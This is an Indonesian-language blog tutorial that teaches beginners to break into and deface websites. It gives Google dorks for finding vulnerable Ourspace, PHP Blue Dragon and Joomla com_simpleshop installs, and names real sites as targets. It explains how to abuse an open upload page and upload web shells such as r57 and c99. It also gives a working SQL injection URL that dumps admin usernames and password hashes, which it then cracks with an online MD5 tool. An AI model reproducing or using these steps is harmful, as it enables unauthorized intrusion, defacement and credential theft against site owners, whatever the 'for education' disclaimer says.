Tutorial Hacking for Newbie

Author: Jaka Reska Firdaus // Category:

Bukan semata-mata saya mengajarkan Hacking untuk keperluan individual saja tetapi gw hanya untuk berbagi sesama pemula dikalangan IT.
Ok, di posting saya kali ini, saya akan mengulas bagaimana cara untuk hacking website dan mendefacex untuk para pemula (y spt saya ini), jadi kita cukup menggunakan dork aja,,

pertama2 buka milw0rm,


Contoh target adalaha ourspace 2.0
pertama cuba buka milw0rm trus klik search, lalu ketik RFI, FILE atau SQL. Disini kita ambil bug
http://www.milw0rm.com/exploits/4343.

1. Buka google, trus ketik allinurl:"/cgi-bin/ourspace/ pada search enginenya.

2. Setelah itu cari situs yang mau di cuba
misalnya neh :

Code:
http://www.2coolcode.com/cgi-bin/ourspace//login.cgi


3. Hapus /cgi-bin/ourspace//login.cgi ganti dengan

Code:
/cgi-bin/ourspace/newswire/uploadmedia.cgi


4. Setelah itu muncul upload files

5. Lu bikin html yang bagus terus upload dah...


Hacking RFI (Remote File Inclusion)
---------------------------------
1. Buka google lalu ketik "Php Blue Dragon"
2. Setelah itu cari situs yang mau dicoba
Contohnya : http://www.komix91.ovh.org. Bugnya cari aja di http://www.milw0rm.com
trus ketik PHP BLUE DRAGON. Hasil dari serach pada milw0rm.

Code:
- http://milw0rm.com/exploits/1779
- http://milw0rm.com/exploits/1913
- http://milw0rm.com/exploits/4276


selanjutnya kalian coba aja sendiri ya. Jangan lupa gunakan shell (r57, c99, dll)

3. Selamat mencoba !

SQL Injection
--------------
Seperti biasa kita membuka site milw0rm untuk melihat bug SQL
contoh BUG SQL http://www.milw0rm.com/exploits/5177

1. Buka google trus ketik allinurl:"com_simpleshop" atau allinurl: "com_simpleshop"section disamping kiri ini berupa dork untuk mencari bug sql pada web.

2. kalau kita telah mendapatnya sekarang kita injeck. Contoh :

Code:
http://www.target.com/index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*



3. Kalau ada hasilnya, silakan deskripsi password adminnya menggunakan tools MD5 crack, bisa menggunakan ini http://thesoftwareengineer.org/services/md5.php

4. Selamat Mencoba

NB: Segala tindakan yang anda lakukan bukanlah tanggung jawab kami, this is just for education..

Repost: Jaka Reska Firdaus Cibinong-Bogor

0 Responses to "Tutorial Hacking for Newbie"

Posting Komentar